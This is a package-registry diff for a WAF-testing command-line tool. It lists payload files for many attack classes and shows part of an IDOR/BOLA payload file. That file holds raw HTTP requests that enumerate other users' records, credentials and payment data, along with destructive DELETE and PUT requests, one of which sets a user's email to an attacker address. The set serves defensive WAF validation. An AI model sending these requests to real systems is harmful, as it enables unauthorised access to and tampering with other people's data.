@waftester/cli 2.8.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +80 -0
- package/LICENSE-COMMUNITY +28 -0
- package/README.md +121 -0
- package/bin/cli.js +152 -0
- package/package.json +52 -0
- package/payloads/community/README.md +45 -0
- package/payloads/community/ai/ml-poisoning.json +173 -0
- package/payloads/community/ai/prompt-injection.json +247 -0
- package/payloads/community/ai/workflow-abuse.json +222 -0
- package/payloads/community/auth/jwt.json +855 -0
- package/payloads/community/auth/login-bypass.json +623 -0
- package/payloads/community/auth/mfa.json +402 -0
- package/payloads/community/auth/oauth.json +421 -0
- package/payloads/community/auth/open-redirect.json +1028 -0
- package/payloads/community/auth/session.json +404 -0
- package/payloads/community/cache/deception.json +402 -0
- package/payloads/community/cache/poisoning.json +403 -0
- package/payloads/community/deserialization/gadget.json +375 -0
- package/payloads/community/deserialization/prototype.json +370 -0
- package/payloads/community/fuzz/content-type.json +397 -0
- package/payloads/community/fuzz/headers.json +401 -0
- package/payloads/community/fuzz/methods.json +397 -0
- package/payloads/community/fuzz/obfuscation.json +362 -0
- package/payloads/community/fuzz/special-chars.json +740 -0
- package/payloads/community/fuzz/waf-bypass.json +452 -0
- package/payloads/community/graphql/batching-abuse.json +271 -0
- package/payloads/community/graphql/depth-limit.json +271 -0
- package/payloads/community/graphql/introspection.json +267 -0
- package/payloads/community/injection/crlf.json +569 -0
- package/payloads/community/injection/ldap.json +357 -0
- package/payloads/community/injection/nosqli.json +529 -0
- package/payloads/community/injection/oscmd.json +662 -0
- package/payloads/community/injection/rce-polyglots.json +452 -0
- package/payloads/community/injection/sqli.json +681 -0
- package/payloads/community/injection/ssti.json +584 -0
- package/payloads/community/injection/upload-attacks.json +632 -0
- package/payloads/community/injection/xpath.json +357 -0
- package/payloads/community/injection/xxe.json +716 -0
- package/payloads/community/logic/forced-browsing.json +405 -0
- package/payloads/community/logic/idor.json +1026 -0
- package/payloads/community/logic/privilege.json +337 -0
- package/payloads/community/media/exif-injection.json +225 -0
- package/payloads/community/media/metadata-poison.json +239 -0
- package/payloads/community/protocol/http-smuggling.json +798 -0
- package/payloads/community/protocol/http2-attacks.json +382 -0
- package/payloads/community/protocol/websocket-abuse.json +375 -0
- package/payloads/community/rate-limit/burst-simulation.json +286 -0
- package/payloads/community/rate-limit/bypass-attempts.json +326 -0
- package/payloads/community/rate-limit/zone-tests.json +332 -0
- package/payloads/community/services/authentik.json +415 -0
- package/payloads/community/services/immich.json +423 -0
- package/payloads/community/services/n8n.json +366 -0
- package/payloads/community/sqli-basic.json +182 -0
- package/payloads/community/ssrf/cloud-metadata.json +999 -0
- package/payloads/community/ssrf/dns-rebinding.json +503 -0
- package/payloads/community/ssrf/internal-networks.json +627 -0
- package/payloads/community/ssrf/protocol-smuggling.json +350 -0
- package/payloads/community/ssti/multi-language-templates.json +191 -0
- package/payloads/community/ssti/python-templates.json +200 -0
- package/payloads/community/traversal/basic.json +675 -0
- package/payloads/community/traversal/cloud-credentials.json +107 -0
- package/payloads/community/traversal/config-files.json +193 -0
- package/payloads/community/traversal/encoding.json +558 -0
- package/payloads/community/traversal/null-byte.json +105 -0
- package/payloads/community/traversal/symlink.json +93 -0
- package/payloads/community/traversal/unicode.json +134 -0
- package/payloads/community/traversal/unix-advanced.json +195 -0
- package/payloads/community/traversal/windows-advanced.json +195 -0
- package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
- package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
- package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
- package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
- package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
- package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
- package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
- package/payloads/community/waf-bypass/unicode-charset.json +152 -0
- package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
- package/payloads/community/waf-validation/README.md +172 -0
- package/payloads/community/waf-validation/bypass-techniques.json +272 -0
- package/payloads/community/waf-validation/custom-rules.json +952 -0
- package/payloads/community/waf-validation/evasion-techniques.json +272 -0
- package/payloads/community/waf-validation/modsecurity-core.json +151 -0
- package/payloads/community/waf-validation/owasp-top10.json +236 -0
- package/payloads/community/waf-validation/regression-tests.json +227 -0
- package/payloads/community/xss/csp-bypass.json +431 -0
- package/payloads/community/xss/dom.json +389 -0
- package/payloads/community/xss/filter-bypass.json +1242 -0
- package/payloads/community/xss/mutation.json +263 -0
- package/payloads/community/xss/polyglots.json +371 -0
- package/payloads/community/xss/reflected.json +187 -0
- package/payloads/community/xss/stored.json +330 -0
- package/payloads/crlf-injection.json +182 -0
- package/payloads/ids-map.json +155 -0
- package/payloads/ldap-injection.json +182 -0
- package/payloads/nosql-injection.json +227 -0
- package/payloads/prototype-pollution.json +182 -0
- package/payloads/request-smuggling.json +182 -0
- package/payloads/version.json +28 -0
- package/payloads/xss-advanced.json +227 -0
- package/templates/README.md +221 -0
- package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
- package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
- package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
- package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
- package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
- package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
- package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
- package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
- package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
- package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
- package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
- package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
- package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
- package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
- package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
- package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
- package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
- package/templates/output/asff.tmpl +61 -0
- package/templates/output/csv.tmpl +4 -0
- package/templates/output/junit.tmpl +34 -0
- package/templates/output/markdown-report.tmpl +92 -0
- package/templates/output/slack-notification.tmpl +95 -0
- package/templates/output/text-summary.tmpl +56 -0
- package/templates/overrides/api-only.yaml +130 -0
- package/templates/overrides/crs-tuning.yaml +204 -0
- package/templates/overrides/false-positive-suppression.yaml +159 -0
- package/templates/policies/owasp-top10.yaml +152 -0
- package/templates/policies/pci-dss.yaml +124 -0
- package/templates/policies/permissive.yaml +40 -0
- package/templates/policies/standard.yaml +57 -0
- package/templates/policies/strict.yaml +72 -0
- package/templates/report-configs/compliance.yaml +173 -0
- package/templates/report-configs/dark.yaml +136 -0
- package/templates/report-configs/enterprise.yaml +175 -0
- package/templates/report-configs/minimal.yaml +84 -0
- package/templates/report-configs/print.yaml +139 -0
- package/templates/workflows/api-scan.yaml +132 -0
- package/templates/workflows/ci-gate.yaml +129 -0
- package/templates/workflows/full-scan.yaml +133 -0
- package/templates/workflows/quick-probe.yaml +80 -0
- package/templates/workflows/waf-detection.yaml +89 -0
|
@@ -0,0 +1,1026 @@
|
|
|
1
|
+
[
|
|
2
|
+
{
|
|
3
|
+
"id": "LOGIC-IDOR-001",
|
|
4
|
+
"payload": "GET /api/users/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
5
|
+
"tags": [
|
|
6
|
+
"idor",
|
|
7
|
+
"numeric-id",
|
|
8
|
+
"quick",
|
|
9
|
+
"critical"
|
|
10
|
+
],
|
|
11
|
+
"expected_block": true,
|
|
12
|
+
"severity_hint": "Critical",
|
|
13
|
+
"notes": "Sequential numeric ID access (user ID 1)",
|
|
14
|
+
"destructive": false,
|
|
15
|
+
"category": "Logic"
|
|
16
|
+
},
|
|
17
|
+
{
|
|
18
|
+
"id": "LOGIC-IDOR-002",
|
|
19
|
+
"payload": "GET /api/users/2 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
20
|
+
"tags": [
|
|
21
|
+
"idor",
|
|
22
|
+
"numeric-id",
|
|
23
|
+
"quick"
|
|
24
|
+
],
|
|
25
|
+
"expected_block": true,
|
|
26
|
+
"severity_hint": "Critical",
|
|
27
|
+
"notes": "Sequential numeric ID access (user ID 2)",
|
|
28
|
+
"destructive": false,
|
|
29
|
+
"category": "Logic"
|
|
30
|
+
},
|
|
31
|
+
{
|
|
32
|
+
"id": "LOGIC-IDOR-003",
|
|
33
|
+
"payload": "GET /api/users/100 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
34
|
+
"tags": [
|
|
35
|
+
"idor",
|
|
36
|
+
"numeric-id"
|
|
37
|
+
],
|
|
38
|
+
"expected_block": true,
|
|
39
|
+
"severity_hint": "Critical",
|
|
40
|
+
"notes": "Higher numeric ID enumeration",
|
|
41
|
+
"destructive": false,
|
|
42
|
+
"category": "Logic"
|
|
43
|
+
},
|
|
44
|
+
{
|
|
45
|
+
"id": "LOGIC-IDOR-004",
|
|
46
|
+
"payload": "GET /api/orders/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
47
|
+
"tags": [
|
|
48
|
+
"idor",
|
|
49
|
+
"order-id",
|
|
50
|
+
"critical"
|
|
51
|
+
],
|
|
52
|
+
"expected_block": true,
|
|
53
|
+
"severity_hint": "Critical",
|
|
54
|
+
"notes": "Order ID enumeration",
|
|
55
|
+
"destructive": false,
|
|
56
|
+
"category": "Logic"
|
|
57
|
+
},
|
|
58
|
+
{
|
|
59
|
+
"id": "LOGIC-IDOR-005",
|
|
60
|
+
"payload": "GET /api/invoices/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
61
|
+
"tags": [
|
|
62
|
+
"idor",
|
|
63
|
+
"invoice-id"
|
|
64
|
+
],
|
|
65
|
+
"expected_block": true,
|
|
66
|
+
"severity_hint": "Critical",
|
|
67
|
+
"notes": "Invoice ID enumeration",
|
|
68
|
+
"destructive": false,
|
|
69
|
+
"category": "Logic"
|
|
70
|
+
},
|
|
71
|
+
{
|
|
72
|
+
"id": "LOGIC-IDOR-006",
|
|
73
|
+
"payload": "GET /api/documents/1/download HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
74
|
+
"tags": [
|
|
75
|
+
"idor",
|
|
76
|
+
"document-access",
|
|
77
|
+
"critical"
|
|
78
|
+
],
|
|
79
|
+
"expected_block": true,
|
|
80
|
+
"severity_hint": "Critical",
|
|
81
|
+
"notes": "Document download via numeric ID",
|
|
82
|
+
"destructive": false,
|
|
83
|
+
"category": "Logic"
|
|
84
|
+
},
|
|
85
|
+
{
|
|
86
|
+
"id": "LOGIC-IDOR-007",
|
|
87
|
+
"payload": "GET /api/users/00000000-0000-0000-0000-000000000001 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
88
|
+
"tags": [
|
|
89
|
+
"idor",
|
|
90
|
+
"uuid-pattern"
|
|
91
|
+
],
|
|
92
|
+
"expected_block": true,
|
|
93
|
+
"severity_hint": "High",
|
|
94
|
+
"notes": "Sequential UUID pattern (all zeros + 1)",
|
|
95
|
+
"destructive": false,
|
|
96
|
+
"category": "Logic"
|
|
97
|
+
},
|
|
98
|
+
{
|
|
99
|
+
"id": "LOGIC-IDOR-008",
|
|
100
|
+
"payload": "GET /api/users/11111111-1111-1111-1111-111111111111 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
101
|
+
"tags": [
|
|
102
|
+
"idor",
|
|
103
|
+
"uuid-pattern"
|
|
104
|
+
],
|
|
105
|
+
"expected_block": true,
|
|
106
|
+
"severity_hint": "High",
|
|
107
|
+
"notes": "Predictable UUID pattern (all ones)",
|
|
108
|
+
"destructive": false,
|
|
109
|
+
"category": "Logic"
|
|
110
|
+
},
|
|
111
|
+
{
|
|
112
|
+
"id": "LOGIC-IDOR-009",
|
|
113
|
+
"payload": "GET /api/users/12345678-1234-1234-1234-123456789012 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
114
|
+
"tags": [
|
|
115
|
+
"idor",
|
|
116
|
+
"uuid-sequential"
|
|
117
|
+
],
|
|
118
|
+
"expected_block": true,
|
|
119
|
+
"severity_hint": "High",
|
|
120
|
+
"notes": "Sequential UUID pattern",
|
|
121
|
+
"destructive": false,
|
|
122
|
+
"category": "Logic"
|
|
123
|
+
},
|
|
124
|
+
{
|
|
125
|
+
"id": "LOGIC-IDOR-010",
|
|
126
|
+
"payload": "GET /api/messages/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
127
|
+
"tags": [
|
|
128
|
+
"idor",
|
|
129
|
+
"message-id",
|
|
130
|
+
"quick"
|
|
131
|
+
],
|
|
132
|
+
"expected_block": true,
|
|
133
|
+
"severity_hint": "Critical",
|
|
134
|
+
"notes": "Private message ID enumeration",
|
|
135
|
+
"destructive": false,
|
|
136
|
+
"category": "Logic"
|
|
137
|
+
},
|
|
138
|
+
{
|
|
139
|
+
"id": "LOGIC-IDOR-011",
|
|
140
|
+
"payload": "GET /api/photos/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
141
|
+
"tags": [
|
|
142
|
+
"idor",
|
|
143
|
+
"photo-id"
|
|
144
|
+
],
|
|
145
|
+
"expected_block": true,
|
|
146
|
+
"severity_hint": "High",
|
|
147
|
+
"notes": "Photo/media ID enumeration (Immich-specific)",
|
|
148
|
+
"destructive": false,
|
|
149
|
+
"category": "Logic"
|
|
150
|
+
},
|
|
151
|
+
{
|
|
152
|
+
"id": "LOGIC-IDOR-012",
|
|
153
|
+
"payload": "GET /api/albums/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
154
|
+
"tags": [
|
|
155
|
+
"idor",
|
|
156
|
+
"album-id"
|
|
157
|
+
],
|
|
158
|
+
"expected_block": true,
|
|
159
|
+
"severity_hint": "High",
|
|
160
|
+
"notes": "Album ID enumeration (Immich-specific)",
|
|
161
|
+
"destructive": false,
|
|
162
|
+
"category": "Logic"
|
|
163
|
+
},
|
|
164
|
+
{
|
|
165
|
+
"id": "LOGIC-IDOR-013",
|
|
166
|
+
"payload": "GET /api/workflows/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
167
|
+
"tags": [
|
|
168
|
+
"idor",
|
|
169
|
+
"workflow-id",
|
|
170
|
+
"critical"
|
|
171
|
+
],
|
|
172
|
+
"expected_block": true,
|
|
173
|
+
"severity_hint": "Critical",
|
|
174
|
+
"notes": "Workflow ID enumeration (n8n-specific)",
|
|
175
|
+
"destructive": false,
|
|
176
|
+
"category": "Logic"
|
|
177
|
+
},
|
|
178
|
+
{
|
|
179
|
+
"id": "LOGIC-IDOR-014",
|
|
180
|
+
"payload": "GET /api/executions/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
181
|
+
"tags": [
|
|
182
|
+
"idor",
|
|
183
|
+
"execution-id"
|
|
184
|
+
],
|
|
185
|
+
"expected_block": true,
|
|
186
|
+
"severity_hint": "High",
|
|
187
|
+
"notes": "Workflow execution ID enumeration (n8n-specific)",
|
|
188
|
+
"destructive": false,
|
|
189
|
+
"category": "Logic"
|
|
190
|
+
},
|
|
191
|
+
{
|
|
192
|
+
"id": "LOGIC-IDOR-015",
|
|
193
|
+
"payload": "GET /api/users/admin HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
194
|
+
"tags": [
|
|
195
|
+
"idor",
|
|
196
|
+
"username-enum"
|
|
197
|
+
],
|
|
198
|
+
"expected_block": true,
|
|
199
|
+
"severity_hint": "Critical",
|
|
200
|
+
"notes": "Username-based ID enumeration",
|
|
201
|
+
"destructive": false,
|
|
202
|
+
"category": "Logic"
|
|
203
|
+
},
|
|
204
|
+
{
|
|
205
|
+
"id": "LOGIC-IDOR-016",
|
|
206
|
+
"payload": "GET /api/users/me/../1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
207
|
+
"tags": [
|
|
208
|
+
"idor",
|
|
209
|
+
"path-traversal"
|
|
210
|
+
],
|
|
211
|
+
"expected_block": true,
|
|
212
|
+
"severity_hint": "Critical",
|
|
213
|
+
"notes": "IDOR via path traversal bypass",
|
|
214
|
+
"destructive": false,
|
|
215
|
+
"category": "Logic"
|
|
216
|
+
},
|
|
217
|
+
{
|
|
218
|
+
"id": "LOGIC-IDOR-017",
|
|
219
|
+
"payload": "GET /api/users?id=1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
220
|
+
"tags": [
|
|
221
|
+
"idor",
|
|
222
|
+
"query-param"
|
|
223
|
+
],
|
|
224
|
+
"expected_block": true,
|
|
225
|
+
"severity_hint": "Critical",
|
|
226
|
+
"notes": "IDOR via query parameter",
|
|
227
|
+
"destructive": false,
|
|
228
|
+
"category": "Logic"
|
|
229
|
+
},
|
|
230
|
+
{
|
|
231
|
+
"id": "LOGIC-IDOR-018",
|
|
232
|
+
"payload": "POST /api/users/profile HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"user_id\":1}",
|
|
233
|
+
"tags": [
|
|
234
|
+
"idor",
|
|
235
|
+
"body-param",
|
|
236
|
+
"critical"
|
|
237
|
+
],
|
|
238
|
+
"expected_block": true,
|
|
239
|
+
"severity_hint": "Critical",
|
|
240
|
+
"notes": "IDOR via POST body parameter",
|
|
241
|
+
"destructive": false,
|
|
242
|
+
"category": "Logic"
|
|
243
|
+
},
|
|
244
|
+
{
|
|
245
|
+
"id": "LOGIC-IDOR-019",
|
|
246
|
+
"payload": "GET /api/users/1/settings HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
247
|
+
"tags": [
|
|
248
|
+
"idor",
|
|
249
|
+
"nested-resource"
|
|
250
|
+
],
|
|
251
|
+
"expected_block": true,
|
|
252
|
+
"severity_hint": "High",
|
|
253
|
+
"notes": "IDOR on nested resource (user settings)",
|
|
254
|
+
"destructive": false,
|
|
255
|
+
"category": "Logic"
|
|
256
|
+
},
|
|
257
|
+
{
|
|
258
|
+
"id": "LOGIC-IDOR-020",
|
|
259
|
+
"payload": "GET /api/users/1/emails HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
260
|
+
"tags": [
|
|
261
|
+
"idor",
|
|
262
|
+
"sensitive-data",
|
|
263
|
+
"critical"
|
|
264
|
+
],
|
|
265
|
+
"expected_block": true,
|
|
266
|
+
"severity_hint": "Critical",
|
|
267
|
+
"notes": "IDOR accessing sensitive user emails",
|
|
268
|
+
"destructive": false,
|
|
269
|
+
"category": "Logic"
|
|
270
|
+
},
|
|
271
|
+
{
|
|
272
|
+
"id": "LOGIC-IDOR-021",
|
|
273
|
+
"payload": "GET /api/users/1/payment-methods HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
274
|
+
"tags": [
|
|
275
|
+
"idor",
|
|
276
|
+
"payment-data",
|
|
277
|
+
"critical"
|
|
278
|
+
],
|
|
279
|
+
"expected_block": true,
|
|
280
|
+
"severity_hint": "Critical",
|
|
281
|
+
"notes": "IDOR accessing payment methods",
|
|
282
|
+
"destructive": false,
|
|
283
|
+
"category": "Logic"
|
|
284
|
+
},
|
|
285
|
+
{
|
|
286
|
+
"id": "LOGIC-IDOR-022",
|
|
287
|
+
"payload": "DELETE /api/photos/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
288
|
+
"tags": [
|
|
289
|
+
"idor",
|
|
290
|
+
"destructive-method",
|
|
291
|
+
"critical"
|
|
292
|
+
],
|
|
293
|
+
"expected_block": true,
|
|
294
|
+
"severity_hint": "Critical",
|
|
295
|
+
"notes": "IDOR with DELETE method on other user's photo",
|
|
296
|
+
"destructive": true,
|
|
297
|
+
"category": "Logic"
|
|
298
|
+
},
|
|
299
|
+
{
|
|
300
|
+
"id": "LOGIC-IDOR-023",
|
|
301
|
+
"payload": "PUT /api/users/1 HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"email\":\"attacker@evil.com\"}",
|
|
302
|
+
"tags": [
|
|
303
|
+
"idor",
|
|
304
|
+
"destructive-method",
|
|
305
|
+
"critical"
|
|
306
|
+
],
|
|
307
|
+
"expected_block": true,
|
|
308
|
+
"severity_hint": "Critical",
|
|
309
|
+
"notes": "IDOR with PUT to modify other user's data",
|
|
310
|
+
"destructive": true,
|
|
311
|
+
"category": "Logic"
|
|
312
|
+
},
|
|
313
|
+
{
|
|
314
|
+
"id": "LOGIC-IDOR-024",
|
|
315
|
+
"payload": "GET /api/assets/1/metadata HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
316
|
+
"tags": [
|
|
317
|
+
"idor",
|
|
318
|
+
"metadata"
|
|
319
|
+
],
|
|
320
|
+
"expected_block": true,
|
|
321
|
+
"severity_hint": "High",
|
|
322
|
+
"notes": "IDOR on asset metadata (Immich)",
|
|
323
|
+
"destructive": false,
|
|
324
|
+
"category": "Logic"
|
|
325
|
+
},
|
|
326
|
+
{
|
|
327
|
+
"id": "LOGIC-IDOR-025",
|
|
328
|
+
"payload": "GET /api/sharing/links/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
329
|
+
"tags": [
|
|
330
|
+
"idor",
|
|
331
|
+
"sharing-link"
|
|
332
|
+
],
|
|
333
|
+
"expected_block": true,
|
|
334
|
+
"severity_hint": "High",
|
|
335
|
+
"notes": "IDOR on sharing links/tokens",
|
|
336
|
+
"destructive": false,
|
|
337
|
+
"category": "Logic"
|
|
338
|
+
},
|
|
339
|
+
{
|
|
340
|
+
"id": "LOGIC-IDOR-026",
|
|
341
|
+
"payload": "GET /api/credentials/1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
342
|
+
"tags": [
|
|
343
|
+
"idor",
|
|
344
|
+
"credentials",
|
|
345
|
+
"critical"
|
|
346
|
+
],
|
|
347
|
+
"expected_block": true,
|
|
348
|
+
"severity_hint": "Critical",
|
|
349
|
+
"notes": "IDOR on stored credentials (n8n)",
|
|
350
|
+
"destructive": false,
|
|
351
|
+
"category": "Logic"
|
|
352
|
+
},
|
|
353
|
+
{
|
|
354
|
+
"id": "LOGIC-IDOR-027",
|
|
355
|
+
"payload": "GET /api/users/-1 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
356
|
+
"tags": [
|
|
357
|
+
"idor",
|
|
358
|
+
"negative-id"
|
|
359
|
+
],
|
|
360
|
+
"expected_block": true,
|
|
361
|
+
"severity_hint": "High",
|
|
362
|
+
"notes": "Negative ID enumeration (sometimes special)",
|
|
363
|
+
"destructive": false,
|
|
364
|
+
"category": "Logic"
|
|
365
|
+
},
|
|
366
|
+
{
|
|
367
|
+
"id": "LOGIC-IDOR-028",
|
|
368
|
+
"payload": "GET /api/users/0 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
369
|
+
"tags": [
|
|
370
|
+
"idor",
|
|
371
|
+
"zero-id",
|
|
372
|
+
"quick"
|
|
373
|
+
],
|
|
374
|
+
"expected_block": true,
|
|
375
|
+
"severity_hint": "High",
|
|
376
|
+
"notes": "Zero ID access (often system/admin user)",
|
|
377
|
+
"destructive": false,
|
|
378
|
+
"category": "Logic"
|
|
379
|
+
},
|
|
380
|
+
{
|
|
381
|
+
"id": "LOGIC-IDOR-029",
|
|
382
|
+
"payload": "GET /api/users/999999 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
383
|
+
"tags": [
|
|
384
|
+
"idor",
|
|
385
|
+
"high-id"
|
|
386
|
+
],
|
|
387
|
+
"expected_block": true,
|
|
388
|
+
"severity_hint": "Medium",
|
|
389
|
+
"notes": "Very high ID enumeration",
|
|
390
|
+
"destructive": false,
|
|
391
|
+
"category": "Logic"
|
|
392
|
+
},
|
|
393
|
+
{
|
|
394
|
+
"id": "LOGIC-IDOR-030",
|
|
395
|
+
"payload": "GET /api/users/1,2,3 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
396
|
+
"tags": [
|
|
397
|
+
"idor",
|
|
398
|
+
"multiple-ids"
|
|
399
|
+
],
|
|
400
|
+
"expected_block": true,
|
|
401
|
+
"severity_hint": "Critical",
|
|
402
|
+
"notes": "Multiple ID enumeration in single request",
|
|
403
|
+
"destructive": false,
|
|
404
|
+
"category": "Logic"
|
|
405
|
+
},
|
|
406
|
+
{
|
|
407
|
+
"id": "BOLA-API-001",
|
|
408
|
+
"payload": "GET /api/v1/accounts/1234 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer user_token\r\n\r\n",
|
|
409
|
+
"tags": ["bola", "api", "account-takeover", "critical"],
|
|
410
|
+
"expected_block": true,
|
|
411
|
+
"severity_hint": "Critical",
|
|
412
|
+
"notes": "BOLA - Accessing another user's account via API",
|
|
413
|
+
"destructive": false,
|
|
414
|
+
"category": "Logic"
|
|
415
|
+
},
|
|
416
|
+
{
|
|
417
|
+
"id": "BOLA-API-002",
|
|
418
|
+
"payload": "GET /api/v2/organizations/1/members HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer user_token\r\n\r\n",
|
|
419
|
+
"tags": ["bola", "api", "org-access", "critical"],
|
|
420
|
+
"expected_block": true,
|
|
421
|
+
"severity_hint": "Critical",
|
|
422
|
+
"notes": "BOLA - Accessing organization members list",
|
|
423
|
+
"destructive": false,
|
|
424
|
+
"category": "Logic"
|
|
425
|
+
},
|
|
426
|
+
{
|
|
427
|
+
"id": "BOLA-API-003",
|
|
428
|
+
"payload": "GET /api/v1/tenants/other-tenant/data HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer user_token\r\n\r\n",
|
|
429
|
+
"tags": ["bola", "multi-tenant", "data-leak", "critical"],
|
|
430
|
+
"expected_block": true,
|
|
431
|
+
"severity_hint": "Critical",
|
|
432
|
+
"notes": "BOLA - Cross-tenant data access",
|
|
433
|
+
"destructive": false,
|
|
434
|
+
"category": "Logic"
|
|
435
|
+
},
|
|
436
|
+
{
|
|
437
|
+
"id": "BOLA-API-004",
|
|
438
|
+
"payload": "GET /api/v1/shops/competitor-shop-id/products HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer merchant_token\r\n\r\n",
|
|
439
|
+
"tags": ["bola", "marketplace", "competitor-access", "critical"],
|
|
440
|
+
"expected_block": true,
|
|
441
|
+
"severity_hint": "Critical",
|
|
442
|
+
"notes": "BOLA - Accessing competitor's product list",
|
|
443
|
+
"destructive": false,
|
|
444
|
+
"category": "Logic"
|
|
445
|
+
},
|
|
446
|
+
{
|
|
447
|
+
"id": "BOLA-API-005",
|
|
448
|
+
"payload": "GET /graphql HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"query\":\"{ user(id: 1) { email ssn creditCard } }\"}",
|
|
449
|
+
"tags": ["bola", "graphql", "sensitive-data", "critical"],
|
|
450
|
+
"expected_block": true,
|
|
451
|
+
"severity_hint": "Critical",
|
|
452
|
+
"notes": "BOLA - GraphQL query for other user's PII",
|
|
453
|
+
"destructive": false,
|
|
454
|
+
"category": "Logic"
|
|
455
|
+
},
|
|
456
|
+
{
|
|
457
|
+
"id": "BOLA-API-006",
|
|
458
|
+
"payload": "GET /api/files/private/user_1_secret.pdf HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
459
|
+
"tags": ["bola", "file-access", "direct-reference", "critical"],
|
|
460
|
+
"expected_block": true,
|
|
461
|
+
"severity_hint": "Critical",
|
|
462
|
+
"notes": "BOLA - Direct file access via predictable name",
|
|
463
|
+
"destructive": false,
|
|
464
|
+
"category": "Logic"
|
|
465
|
+
},
|
|
466
|
+
{
|
|
467
|
+
"id": "BOLA-API-007",
|
|
468
|
+
"payload": "GET /api/exports/report_12345.xlsx HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
469
|
+
"tags": ["bola", "export", "report-access", "critical"],
|
|
470
|
+
"expected_block": true,
|
|
471
|
+
"severity_hint": "Critical",
|
|
472
|
+
"notes": "BOLA - Accessing another user's exported report",
|
|
473
|
+
"destructive": false,
|
|
474
|
+
"category": "Logic"
|
|
475
|
+
},
|
|
476
|
+
{
|
|
477
|
+
"id": "BOLA-API-008",
|
|
478
|
+
"payload": "GET /api/v1/subscriptions/sub_12345 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
479
|
+
"tags": ["bola", "subscription", "billing", "critical"],
|
|
480
|
+
"expected_block": true,
|
|
481
|
+
"severity_hint": "Critical",
|
|
482
|
+
"notes": "BOLA - Access to another user's subscription details",
|
|
483
|
+
"destructive": false,
|
|
484
|
+
"category": "Logic"
|
|
485
|
+
},
|
|
486
|
+
{
|
|
487
|
+
"id": "BOLA-HEADER-001",
|
|
488
|
+
"payload": "GET /api/profile HTTP/1.1\r\nHost: target.com\r\nX-User-ID: 1\r\n\r\n",
|
|
489
|
+
"tags": ["bola", "header-injection", "user-id", "critical"],
|
|
490
|
+
"expected_block": true,
|
|
491
|
+
"severity_hint": "Critical",
|
|
492
|
+
"notes": "BOLA - User ID override via X-User-ID header",
|
|
493
|
+
"destructive": false,
|
|
494
|
+
"category": "Logic"
|
|
495
|
+
},
|
|
496
|
+
{
|
|
497
|
+
"id": "BOLA-HEADER-002",
|
|
498
|
+
"payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nX-Account-ID: admin-account-id\r\n\r\n",
|
|
499
|
+
"tags": ["bola", "header-injection", "account-id", "critical"],
|
|
500
|
+
"expected_block": true,
|
|
501
|
+
"severity_hint": "Critical",
|
|
502
|
